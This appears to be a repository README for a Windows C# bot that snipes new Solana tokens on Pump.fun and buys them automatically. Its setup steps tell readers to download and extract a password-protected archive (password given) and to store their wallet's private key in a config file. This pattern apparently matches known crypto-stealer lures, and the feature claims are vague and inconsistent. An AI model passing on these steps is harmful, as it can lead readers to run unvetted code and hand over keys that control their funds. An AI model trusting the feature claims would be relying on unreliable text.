Bot built with C# and the Solnet library, designed to target and execute transaction sniping on Pump.fun within the Solana blockchain ecosystem.
- Connects to the Solana MainNet.
- Creates and sends transactions to a specified target account.
- Configurable via environment variables.
- Sniper Functionality: Offers rapid detection and acquisition of newly listed tokens by scanning Dextools and PumpFun.
- Profit-Driven Token Analysis: Deploys sophisticated algorithms to pinpoint tokens with high growth potential.
- Adjustable Parameters: Empowers users to fine-tune their buying strategies through customizable settings.
- Live Price Tracking: Delivers real-time updates and continuous monitoring of token prices.
- Automated Purchasing: Facilitates the automatic acquisition of tokens on the Solana blockchain via Raydium or Jupiter platforms.
- Download the repository.
- extract archive with pass
vL10AI
. - create a
config.json
in the project's root directory and define your environment variables. You can use the providedconfig.json
. - run the bot.
The bot uses environment variables for configuration. Create a config.json
file in the root directory and set the following variables:
maxPosition
: The amount of sol for which a particular token will be purchased.timeoutScan
: Time interval followed by interaction.solPrivate
: Your Solana wallet's private key.rpc
: Rpc to which the wallet will be connected example(Shyft).
Example config.json
file:
{
"mainSettings": {
"maxPosition": "0.1",
"timeoutScan": "25",
"rpc": "https://<your-solana-rpc>.com:<port>",
"solPrivate": "<your-solana-private-key>"
}
}
-
Framework 4.0 and more.
-
Windows 10/11.
-
Solnet Libraries: The project uses the Solnet library to interact with the Solana blockchain.
-
.NET SDK: Make sure you have the .NET SDK installed. You can download it from the .NET official site.